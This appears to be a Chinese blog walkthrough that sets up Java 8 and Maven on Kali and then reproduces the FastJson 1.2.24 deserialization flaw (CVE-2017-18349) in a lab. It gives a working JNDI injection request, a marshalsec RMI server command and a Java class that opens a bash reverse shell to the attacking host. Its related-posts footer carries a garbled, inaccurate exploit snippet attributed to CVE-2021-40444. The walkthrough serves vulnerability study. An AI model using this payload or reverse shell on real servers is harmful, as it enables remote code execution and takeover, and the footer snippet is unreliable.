kali下java任意版本安装、切换;maven配置;CVE-2017-18349(FastJson1.2.24反序列化导致任意命令执行漏洞)复现,从环境配置到复现保姆级过程

已于 2023-09-17 17:53:29 修改
阅读量891 收藏 6
点赞数 2
分类专栏: 渗透测试 文章标签: java maven 开发语言 安全
于 2023-09-17 01:56:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54346898/article/details/132931439
版权

声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。文章为作者个人笔记及分享,如有错误或可改进的地方,欢迎各位大佬予以斧正

前期准备:1、配置Java8环境;2、配置maven环境

本机默认Java版本

通过一下链接下载Java8

https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz

创建Java文件夹

将下载的压缩包移动到Java目录下

切换到Java目录并解压

配置环境变量

Vim /etc/profile

将以下内容复制到最底下

    JAVA_HOME=/usr/local/java/jdk1.8.0_202

    PATH=$PATH:$HOME/bin:$JAVA_HOME/bin

    export JAVA_HOME

    export PATH

使用以下命令通知系统Java的位置

update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_202/bin/java" 1

update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_202/bin/javac" 1

update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_202/bin/javaws" 1

update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_202/bin/javaws" 1

重新载入profile

source /etc/profile

但是此时系统还是Java11

Javac却没问题

因为Java默认使用的是系统版本,接下来将切换

使用命令update-alternatives --config java

成功安装

接下来安装maven,通过命令直接安装,简单很多,apt-get install maven

找到settings,配置仓库镜像和Java版本

仓库配置

镜像配置

配置Java版本

配置mvn环境变量

配置好以后重新载入profile即可。

环境配置好之后接下来开始实验部分

靶机ip:192.168.1.163/

http,rmi服务ip:192.168.1.160/

攻击机ip:192.168.1.150/

开启实验环境

下载所要用到的工具及poc/exp

git clone GitHub - h0cksr/Fastjson--CVE-2017-18349-

编译.java文件

在此目录开启http服务

保证被攻击机能访问到攻击机http服务

git clone GitHub - mbechler/marshalsec

进入marshalsec目录,执行mvn clean package -DskipTests 编译生成的marshalsec的jar包执行上面的命令必须在有pom.xml的目录下执行

装好以后明显多了一个target,并进入此目录执行以下命令便可开启rmi服务或ldap服务线程加载.class文件,具体工具使用可上github查看作者说明

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.1.160:8888/#TouchFile”,注意引号必须是英文

通过访问靶机并抓包

修改数据包

数据包如下

POST / HTTP/1.1
Host: 192.168.238.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 167

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.238.128:1099/TouchFile",
        "autoCommit":true
    }
}

切换到靶机去看看成功执行没有

第一条命令是查看容器id,第二条是进入容器

反弹shell,首先重新配置脚本

脚本配置

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.238.128/6666 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

重复以上步骤并开启监听

小洋仔0
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
#kali中不同jdk版本切换
Ethan_cfq的博客
03-30 3814
Java版本切换
关于kali2.0上python的设置切换默认版本
11-23
关于kali2.0上python的设置切换默认版本kali2.0默认的是Python2.x版本,要想跟上潮流还是要学Python3.x的版本
kali配置不同版本java并随时切换
Cwillchris的博客
03-13 2410
2、建立目录,将下载的jdk的安装包复制过去并进行解压。3、配置环境变量(注意下面的版本号要与自己下载的相同)打开文件/etc/profile。4、通知系统Java的位置。5、重新载入profile。1、安装JDK1.8。添加下列代码到文件中。
Kali 安装或更换 jdk 版本
最新发布
m0_66490812的博客
04-21 695
JDK是 Java 语言的软件开发工具包,主要用于移动设备、嵌入式设备上的java应用程序。JDK是整个java开发的核心,它包含了JAVA的运行环境(JVM+Java系统类库)和JAVA工具。
kali linux多版本java共存并自由切换 update-alternatives
夜星空如海的博客
09-24 774
kali linux多版本java共存
kali java插件,Kali Linux 定制第N步:配置Java开发环境
weixin_28982301的博客
03-10 554
1. 介绍:Java开发环境包括 Jdk 以及各种 IDE,最流行的莫过于 jdk + eclipse 组合。本章将对 jdk 以及 eclipse 的安装进行讲解。2. 展示:**Jdk&Eclipse**3. 安装(Linux版):1) JDK**DOWNLOAD**点击 DOWNLOAD;**License Agreement**点击 Accept License Agreement...
kali2.0下JAVA安装
weixin_30617737的博客
04-17 238
参考网址:http://www.blackmoreops.com/2013/10/26/how-to-install-java-jdk-in-kali-linux/1.下载javase,http://www.oracle.com/technetwork/java/javase/downloads/index.html2.解压:tar zxvf jdk-8u77-linux-x64.tar...
kali linux 踩坑记录(一)kali 2020.1版本安装配置 中文乱码 中文输入法
01-09
官方下载 ——这里选择虚拟机版本 这里附上最新版2020.1的种子:链接:https://pan.baidu.com/s/1vy-HlP8QBPnjgzxXtHbSbw 提取码:vtkg 下载完是一个压缩包,解压缩得到虚拟机文件 打开VMware(我这里是VMware ...
CVE-2019-0708漏洞利用脚本
01-10
自己下载到kali解压,参考文章https://blog.csdn.net/weixin_43742395/article/details/112432343
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
IIS6.0最完整的利用,从远程利用,到本地提权,再到常见失败原因(CVE-2017-7269)1
08-04
2017年,一个名为CVE-2017-7269的安全漏洞被公开,该漏洞影响了IIS 6.0,允许远程攻击者通过WebDAV功能执行任意代码。本文将详细介绍如何利用此漏洞进行远程攻击、本地提权,以及可能遇到的常见问题。 **一、远程...
kali切换jdk版本
钻石
02-10 7935
最近更新了kali系统,把jdk更新到了10.0.2了,,结果导致破解burpsuite的注册机不能用了,不得不切换jdk版本。  由于官网下载jdk很慢(复制链接到迅雷下载快点),所以给出我整理jdk百度云jdk7,8,9,           链接:https://pan.baidu.com/s/14Gz0HQSyVk8yy2EkV5XHfg  提取码:nklg 下载下来解压:    ...
Kali安装JAVA8和切换JDK版本的详细过程
huayimy的博客
04-20 4442
Kali安装JAVA8和切换JDK版本的详细过程
Kali安装JDK1.8和切换JDK版本
weixin_55505454的博客
01-05 3211
Kali安装JDK版本Kali下自由更换JDK版本
java安装常见问题之Kali永久配置环境变量
woaipdd的博客
04-29 1268
我后面放zeek也是模仿这两段写的,把JAVA_HOME改成了ZEEK_HOME哈哈,别问,问就是不懂为啥要这样写两行,反正跟着我这么弄能添加成功就行(PS:javahome后面那个是你java压缩包解压出来的那个文件夹的路径,你也可以学我放到usr/local/java里,自己在local里创建一个java文件夹就可以,放文件夹的位置其实是没有要求的)好像是对所有用户都生效,不过我不管,反正我就一个账户,平常操作也都有root权限,我只要再开终端时不用再加一次环境变量就行。然后来浏览这个文件的内容。
【linux】kali 更换Java JDk版本
qq_34965596的博客
05-20 7414
查看当前 JDK 版本信息 首先查看当前系统中存在的 jdk 版本以及当前 jdk 版本 root@kali:~# update-alternatives --config java 有 3 个候选项可用于替换 java (提供 /usr/bin/java)。 选择 路径 优先 状态 ------------------------------------------------------------
linux jdk版本随时切换版本随时切换实现方法
qq_37376713的博客
04-05 359
这篇文章主要介绍了linux jdk版本随时切换版本随时切换实现方法的相关资料,需要的朋友可以参考下 项目处理问题遇到如下情况,引用第三方的jar包报出ClassDefNotFoundException错误导致app崩溃,双方沟通确认该类存在且排除工程未clean,代码混淆导致等原因。 注意到编译app的时候提示了很多如下与正常情况下不一样的信息: trouble processing:
Kali Linux下的JDK8,JDK11,JDK17和VSCode配置
m0_74075298的博客
01-17 3137
Linux环境下JDK8,JDK11,JDK17共存和VSCode的配置
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值